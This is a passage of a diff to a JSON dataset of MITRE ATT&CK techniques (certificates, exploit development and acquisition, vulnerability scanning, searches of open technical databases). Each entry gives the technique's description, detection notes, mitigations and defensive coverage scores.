-                "description": "Adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA).\n\nAdversaries may create self-signed SSL/TLS certificates that can be used to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) if added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)).\n\nAfter creating a digital certificate, an adversary may then install that certificate (see [Install Digital Certificate](https://attack.mitre.org/techniques/T1608/003)) on infrastructure under their control.",
-                "detection": "Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017)\n\nDetection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).",
-                "mitigations": [
-                    {
-                        "mid": "M1056",
-                        "name": "Pre-compromise",
-                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
-                        "url": "https://attack.mitre.org/mitigations/M1056"
-                    }
-                ]
-            },
-            {
-                "tid": "T1587.004",
-                "name": "Develop Capabilities: Exploits",
-                "url": "https://attack.mitre.org/techniques/T1587/004",
-                "description": "Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.(Citation: NYTStuxnet) Adversaries may use information acquired via [Vulnerabilities](https://attack.mitre.org/techniques/T1588/006) to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.(Citation: Irongeek Sims BSides 2017)\n\nAs with legitimate development efforts, different skill sets may be required for developing exploits. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's exploit development capabilities, provided the adversary plays a role in shaping requirements and maintains an initial degree of exclusivity to the exploit.\n\nAdversaries may use exploits during various phases of the adversary lifecycle (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).",
-                "detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on behaviors relating to the use of exploits (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).",
-                "mitigations": [
-                    {
-                        "mid": "M1056",
-                        "name": "Pre-compromise",
-                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
-                        "url": "https://attack.mitre.org/mitigations/M1056"
-                    }
-                ]
-            }
+            "Network Traffic: Network Traffic Flow"
         ],
+        "is_subtechnique": true,
+        "supertechnique": "T1595",
+        "subtechniques": [],
         "mitigations": [
             {
                 "mid": "M1056",
@@ -18948,53 +41633,89 @@
                 "url": "https://attack.mitre.org/mitigations/M1056"
             }
         ],
-        "cumulative_score": 0.09761904761904762,
-        "adjusted_score": 0.09761904761904762,
+        "cumulative_score": 0.07380952380952381,
+        "adjusted_score": 0.07380952380952381,
         "has_car": false,
         "has_sigma": true,
         "has_es_siem": false,
         "has_splunk": false,
-        "cis_controls": [],
+        "cis_controls": [
+            "18.2",
+            "18.3"
+        ],
         "nist_controls": [],
         "process_coverage": false,
-        "network_coverage": false,
+        "network_coverage": true,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.047619047619047616,
-            "detection_score": 0.1
-        },
-        "choke_point_score": 0.05,
-        "prevalence_score": 0
+        "hardware_coverage": false
     },
     {
-        "tid": "T1588",
-        "name": "Obtain Capabilities",
-        "description": "Adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle.\n\nIn addition to downloading free malware, software, and exploits from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware and exploits, criminal marketplaces, or from individuals.(Citation: NationsBuying)(Citation: PegasusCitizenLab)\n\nIn addition to purchasing capabilities, adversaries may steal capabilities from third-party entities (including other adversaries). This can include stealing software licenses, malware, SSL/TLS and code-signing certificates, or raiding closed databases of vulnerabilities or exploits.(Citation: DiginotarCompromise)",
-        "url": "https://attack.mitre.org/techniques/T1588",
+        "tid": "T1595.002",
+        "name": "Active Scanning: Vulnerability Scanning",
+        "description": "Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use.\n\nThese scans may also include more broad attempts to [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592) that can be used to identify more commonly known, exploitable vulnerabilities. Vulnerability scans typically harvest running software and version numbers via server banners, listening ports, or other network artifacts.(Citation: OWASP Vuln Scanning) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).",
+        "url": "https://attack.mitre.org/techniques/T1595/002",
         "tactics": [
-            "Resource Development"
+            "Reconnaissance"
         ],
-        "detection": "Consider analyzing malware for features that may be associated with malware providers, such as compiler used, debugging artifacts, code similarities, or even group identifiers associated with specific Malware-as-a-Service (MaaS) offerings. Malware repositories can also be used to identify additional samples associated with the developers and the adversary utilizing their services. Identifying overlaps in malware use by different adversaries may indicate malware was obtained by the adversary rather than developed by them. In some cases, identifying overlapping characteristics in malware used by different adversaries may point to a shared quartermaster.(Citation: FireEyeSupplyChain) Malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)\n\nConsider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.",
+        "detection": "Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields.\n\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
         "platforms": [
             "PRE"
         ],
         "data_sources": [
-            "Certificate: Certificate Registration",
-            "Internet Scan: Response Content",
-            "Malware Repository: Malware Content",
-            "Malware Repository: Malware Metadata"
+            "Network Traffic: Network Traffic Content",
+            "Network Traffic: Network Traffic Flow"
         ],
+        "is_subtechnique": true,
+        "supertechnique": "T1595",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1056",
+                "name": "Pre-compromise",
+                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1056"
+            }
+        ],
+        "cumulative_score": 0.06904761904761905,
+        "adjusted_score": 0.06904761904761905,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "18.2",
+            "18.3"
+        ],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": true,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1596",
+        "name": "Search Open Technical Databases",
+        "description": "Adversaries may search freely available technical databases for information about victims that can be used during targeting. Information about victims may be available in online databases and repositories, such as registrations of domains/certificates as well as public collections of network data/artifacts gathered from traffic and/or scans.(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS)(Citation: Medium SSL Cert)(Citation: SSLShopper Lookup)(Citation: DigitalShadows CDN)(Citation: Shodan)\n\nAdversaries may search in different open databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).",
+        "url": "https://attack.mitre.org/techniques/T1596",
+        "tactics": [
+            "Reconnaissance"
+        ],
+        "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
+        "platforms": [
+            "PRE"
+        ],
+        "data_sources": [],
         "is_subtechnique": false,
         "supertechnique": null,
         "subtechniques": [
             {
-                "tid": "T1588.001",
-                "name": "Obtain Capabilities: Malware",
-                "url": "https://attack.mitre.org/techniques/T1588/001",
-                "description": "Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.\n\nIn addition to downloading free malware from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware development, criminal marketplaces (including Malware-as-a-Service, or MaaS), or from individuals. In addition to purchasing malware, adversaries may steal and repurpose malware from third-party entities (including other adversaries).",
-                "detection": "Consider analyzing malware for features that may be associated with malware providers, such as compiler used, debugging artifacts, code similarities, or even group identifiers associated with specific MaaS offerings. Malware repositories can also be used to identify additional samples associated with the developers and the adversary utilizing their services. Identifying overlaps in malware use by different adversaries may indicate malware was obtained by the adversary rather than developed by them. In some cases, identifying overlapping characteristics in malware used by different adversaries may point to a shared quartermaster.(Citation: FireEyeSupplyChain)\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.",
+                "tid": "T1596.001",
+                "name": "Search Open Technical Databases: DNS/Passive DNS",
+                "url": "https://attack.mitre.org/techniques/T1596/001",
+                "description": "Adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts.\n\nAdversaries may search DNS data to gather actionable information. Threat actors can query nameservers for a target organization directly, or search through centralized repositories of logged DNS query responses (known as passive DNS).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Adversaries may also seek and target DNS misconfigurations/leaks that reveal information about internal networks. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).",
+                "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
                 "mitigations": [
                     {
                         "mid": "M1056",
@@ -19005,11 +41726,11 @@
                 ]
             },
             {
-                "tid": "T1588.002",
-                "name": "Obtain Capabilities: Tool",
-                "url": "https://attack.mitre.org/techniques/T1588/002",
-                "description": "Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.(Citation: Recorded Future Beacon 2019)\n\nAdversaries may obtain tools to support their operations, including to support execution of post-compromise behaviors. In addition to freely downloading or purchasing software, adversaries may steal software and/or software licenses from third-party entities (including other adversaries).",
-                "detection": "In some cases, malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.",
+                "tid": "T1596.002",
+                "name": "Search Open Technical Databases: WHOIS",
+                "url": "https://attack.mitre.org/techniques/T1596/002",
+                "description": "Adversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is stored by regional Internet registries (RIR) responsible for allocating and assigning Internet resources such as domain names. Anyone can query WHOIS servers for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers.(Citation: WHOIS)\n\nAdversaries may search WHOIS data to gather actionable information. Threat actors can use online resources or command-line utilities to pillage through WHOIS data for information about potential victims. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).",
+                "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
                 "mitigations": [
                     {
                         "mid": "M1056",
@@ -19020,11 +41741,11 @@
                 ]
             },
             {
-                "tid": "T1588.003",
-                "name": "Obtain Capabilities: Code Signing Certificates",
-                "url": "https://attack.mitre.org/techniques/T1588/003",
-                "description": "Adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.\n\nPrior to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may purchase or steal code signing certificates for use in operations. The purchase of code signing certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal code signing materials directly from a compromised third-party.",
-                "detection": "Consider analyzing code signing certificates for features that may be associated with the adversary and/or their developers, such as the thumbprint, algorithm used, validity period, common name, and certificate authority. Malware repositories can also be used to identify additional samples associated with the adversary and identify patterns an adversary has used in procuring code signing certificates.\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related follow-on behavior, such as [Code Signing](https://attack.mitre.org/techniques/T1553/002) or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).",
+                "tid": "T1596.003",
+                "name": "Search Open Technical Databases: Digital Certificates",
+                "url": "https://attack.mitre.org/techniques/T1596/003",
+                "description": "Adversaries may search public digital certificate data for information about victims that can be used during targeting. Digital certificates are issued by a certificate authority (CA) in order to cryptographically verify the origin of signed content. These certificates, such as those used for encrypted web traffic (HTTPS SSL/TLS communications), contain information about the registered organization such as name and location.\n\nAdversaries may search digital certificate data to gather actionable information. Threat actors can use online resources and lookup tools to harvest information about certificates.(Citation: SSLShopper Lookup) Digital certificate data may also be available from artifacts signed by the organization (ex: certificates used from encrypted web traffic are served with content).(Citation: Medium SSL Cert) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).",
+                "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
                 "mitigations": [
                     {
                         "mid": "M1056",
@@ -19035,11 +41756,11 @@
                 ]
             },
             {
-                "tid": "T1588.004",
-                "name": "Obtain Capabilities: Digital Certificates",
-                "url": "https://attack.mitre.org/techniques/T1588/004",
-                "description": "Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner.\n\nAdversaries may purchase or steal SSL/TLS certificates to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) if the certificate is trusted or otherwise added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)). The purchase of digital certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal certificate materials directly from a compromised third-party, including from certificate authorities.(Citation: DiginotarCompromise) Adversaries may register or hijack domains that they will later purchase an SSL/TLS certificate for.\n\nCertificate authorities exist that allow adversaries to acquire SSL/TLS certificates, such as domain validation certificates, for free.(Citation: Let's Encrypt FAQ)\n\nAfter obtaining a digital certificate, an adversary may then install that certificate (see [Install Digital Certificate](https://attack.mitre.org/techniques/T1608/003)) on infrastructure under their control.",
-                "detection": "Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)\n\nDetection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).",
+                "tid": "T1596.004",
+                "name": "Search Open Technical Databases: CDNs",
+                "url": "https://attack.mitre.org/techniques/T1596/004",
+                "description": "Adversaries may search content delivery network (CDN) data about victims that can be used during targeting. CDNs allow an organization to host content from a distributed, load balanced array of servers. CDNs may also allow organizations to customize content delivery based on the requestor’s geographical region.\n\nAdversaries may search CDN data to gather actionable information. Threat actors can use online resources and lookup tools to harvest information about content servers within a CDN. Adversaries may also seek and target CDN misconfigurations that leak sensitive information not intended to be hosted and/or do not have the same protection mechanisms (ex: login portals) as the content hosted on the organization’s website.(Citation: DigitalShadows CDN) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)).",
+                "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
                 "mitigations": [
                     {
                         "mid": "M1056",
@@ -19050,11 +41771,11 @@
                 ]
             },
             {
-                "tid": "T1588.005",
-                "name": "Obtain Capabilities: Exploits",
-                "url": "https://attack.mitre.org/techniques/T1588/005",
-                "description": "Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.(Citation: Exploit Database)(Citation: TempertonDarkHotel)(Citation: NationsBuying)\n\nIn addition to downloading free exploits from the internet, adversaries may purchase exploits from third-party entities. Third-party entities can include technology companies that specialize in exploit development, criminal marketplaces (including exploit kits), or from individuals.(Citation: PegasusCitizenLab)(Citation: Wired SandCat Oct 2019) In addition to purchasing exploits, adversaries may steal and repurpose exploits from third-party entities (including other adversaries).(Citation: TempertonDarkHotel)\n\nAn adversary may monitor exploit provider forums to understand the state of existing, as well as newly discovered, exploits. There is usually a delay between when an exploit is discovered and when it is made public. An adversary may target the systems of those known to conduct exploit research and development in order to gain that knowledge for use during a subsequent operation.\n\nAdversaries may use exploits during various phases of the adversary lifecycle (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).",
-                "detection": "\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on behaviors relating to the use of exploits (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).",
+                "tid": "T1596.005",
+                "name": "Search Open Technical Databases: Scan Databases",
+                "url": "https://attack.mitre.org/techniques/T1596/005",
+                "description": "Adversaries may search within public scan databases for information about victims that can be used during targeting. Various online services continuously publish the results of Internet scans/surveys, often harvesting information such as active IP addresses, hostnames, open ports, certificates, and even server banners.(Citation: Shodan)\n\nAdversaries may search scan databases to gather actionable information. Threat actors can use online resources and lookup tools to harvest information from these services. Adversaries may seek information about their already identified targets, or use these datasets to discover opportunities for successful breaches. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).",
+                "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
                 "mitigations": [
                     {
                         "mid": "M1056",
@@ -19063,23 +41784,49 @@
                         "url": "https://attack.mitre.org/mitigations/M1056"
                     }
                 ]
-            },
+            }
+        ],
+        "mitigations": [
             {
-                "tid": "T1588.006",
-                "name": "Obtain Capabilities: Vulnerabilities",
-                "url": "https://attack.mitre.org/techniques/T1588/006",
-                "description": "Adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by searching open databases or gaining access to closed vulnerability databases.(Citation: National Vulnerability Database)\n\nAn adversary may monitor vulnerability disclosures/databases to understand the state of existing, as well as newly discovered, vulnerabilities. There is usually a delay between when a vulnerability is discovered and when it is made public. An adversary may target the systems of those known to conduct vulnerability research (including commercial vendors). Knowledge of a vulnerability may cause an adversary to search for an existing exploit (i.e. [Exploits](https://attack.mitre.org/techniques/T1588/005)) or to attempt to develop one themselves (i.e. [Exploits](https://attack.mitre.org/techniques/T1587/004)).",
-                "detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on behaviors relating to the potential use of exploits for vulnerabilities (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).",
-                "mitigations": [
-                    {
-                        "mid": "M1056",
-                        "name": "Pre-compromise",
-                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
-                        "url": "https://attack.mitre.org/mitigations/M1056"
-                    }
-                ]
+                "mid": "M1056",
+                "name": "Pre-compromise",
+                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1056"
             }
         ],
+        "cumulative_score": 0.05,
+        "adjusted_score": 0.05,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {},
+        "choke_point_score": 0.05,
+        "prevalence_score": 0
+    },
+    {
+        "tid": "T1596.001",
+        "name": "Search Open Technical Databases: DNS/Passive DNS",
+        "description": "Adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts.\n\nAdversaries may search DNS data to gather actionable information. Threat actors can query nameservers for a target organization directly, or search through centralized repositories of logged DNS query responses (known as passive DNS).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Adversaries may also seek and target DNS misconfigurations/leaks that reveal information about internal networks. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).",
+        "url": "https://attack.mitre.org/techniques/T1596/001",
+        "tactics": [
+            "Reconnaissance"
+        ],
+        "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
+        "platforms": [
+            "PRE"
+        ],
+        "data_sources": [],
+        "is_subtechnique": true,
+        "supertechnique": "T1596",
+        "subtechniques": [],
         "mitigations": [
             {
                 "mid": "M1056",
@@ -19088,10 +41835,10 @@
                 "url": "https://attack.mitre.org/mitigations/M1056"
             }
         ],
-        "cumulative_score": 0.05476190476190476,
-        "adjusted_score": 0.05476190476190476,
+        "cumulative_score": 0.05,
+        "adjusted_score": 0.05,
         "has_car": false,
-        "has_sigma": true,
+        "has_sigma": false,
         "has_es_siem": false,
         "has_splunk": false,
         "cis_controls": [],
@@ -19100,19 +41847,13 @@
         "network_coverage": false,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.0047619047619047615,
-            "detection_score": 0.01
-        },
-        "choke_point_score": 0.05,
-        "prevalence_score": 0
+        "hardware_coverage": false
     },
     {
-        "tid": "T1589",
-        "name": "Gather Victim Identity Information",
